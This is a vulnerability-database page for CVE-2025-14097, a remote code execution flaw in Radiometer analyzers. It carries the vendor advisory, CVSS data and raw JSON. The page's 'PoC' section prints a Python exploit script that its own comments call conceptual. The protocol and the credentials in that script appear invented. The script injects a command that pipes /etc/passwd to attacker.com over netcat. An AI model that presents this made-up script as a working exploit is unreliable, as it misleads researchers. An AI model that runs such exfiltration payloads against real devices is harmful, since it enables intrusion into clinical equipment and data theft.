Security Vulnerability Report
中文
CVE-2025-14097 CVSS 7.2 HIGH

CVE-2025-14097

Published: 2025-12-17 13:15:58
Last Modified: 2026-04-15 00:35:42
Source: 46b595e9-1acc-41cb-9398-adaf98d37a9b

Description

A vulnerability in the application software of multiple Radiometer products may allow remote code execution and unauthorized device management when specific internal conditions are met. Exploitation requires that a remote connection is established with additional information obtained through other means. The issue is caused by a weakness in the analyzer’s application software.                                                                                                                                                                                                Other related CVE's are CVE-2025-14095 & CVE-2025-14096.                                                                                                      Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency. Required Configuration for Exposure: Affected application software version is in use and remote support feature is enabled in the analyzer.                                                                                                                                                                        Temporary work Around: If the network is not considered secure, please remove the analyzer from the network.                         Permanent solution: Customers should ensure the following: • The network is secure, and access follows best practices. Local Radiometer representatives will contact all affected customers to discuss a permanent solution.                                                      Exploit Status: Researchers have provided working proof-of-concept (PoC). Radiometer is not aware of any publicly available exploits at the time of this publication.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Radiometer Analyzer (Remote Support Feature Enabled)
所有启用远程支持功能的受影响应用软件版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14097 PoC - Radiometer Analyzer RCE # Note: This is a conceptual PoC based on the vulnerability description # Actual exploitation requires specific conditions and network access import socket import struct import sys def exploit_radiometer(target_ip, target_port=8080): """ Conceptual exploit for CVE-2025-14097 Requirements: - Remote support feature enabled - Valid high-privilege credentials - Network access to the analyzer """ try: # Step 1: Establish remote connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) # Step 2: Send authentication with high-privilege credentials auth_payload = b'AUTH\x00' + b'admin:password'.hex().encode() sock.send(auth_payload) # Step 3: Send malicious payload exploiting remote support feature # The vulnerability allows code execution through insufficient input validation exploit_payload = ( b'\x00\x00\x00\x01' + # Protocol version b'\x00\x00\x00\x00' + # Sequence number b'REMOTE_CMD\x00' + # Command type b'; cat /etc/passwd | nc attacker.com 4444' # Malicious command ) sock.send(exploit_payload) response = sock.recv(4096) print(f"Response: {response}") sock.close() return True except Exception as e: print(f"Exploit failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-14097.py <target_ip> <port>") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) exploit_radiometer(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14097", "sourceIdentifier": "46b595e9-1acc-41cb-9398-adaf98d37a9b", "published": "2025-12-17T13:15:58.050", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the application software of multiple Radiometer products may allow remote code execution and unauthorized device management when specific internal conditions are met. Exploitation requires that a remote connection is established with additional information obtained through other means. The issue is caused by a weakness in the analyzer’s application software.                                                                                                                                                                                                Other related CVE's are CVE-2025-14095 & CVE-2025-14096.                                                                                                      Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency.\n\n\n\nRequired Configuration for Exposure: Affected application software version is in use and remote support feature is enabled in the analyzer.                                                                                                                                                                        Temporary work Around: If the network is not considered secure, please remove the analyzer from the network.                         Permanent solution:\nCustomers should ensure the following:\n• The network is secure, and access follows best practices.\nLocal Radiometer representatives will contact all affected customers to discuss a permanent solution.                                                     \nExploit Status:\n\n\nResearchers have provided working proof-of-concept (PoC). Radiometer is not aware of any publicly available exploits at the time of this publication."}], "metrics": {"cvssMetricV31": [{"source": "46b595e9-1acc-41cb-9398-adaf98d37a9b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "46b595e9-1acc-41cb-9398-adaf98d37a9b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://www.radiometer.com/myradiometer", "source": "46b595e9-1acc-41cb-9398-adaf98d37a9b"}]}}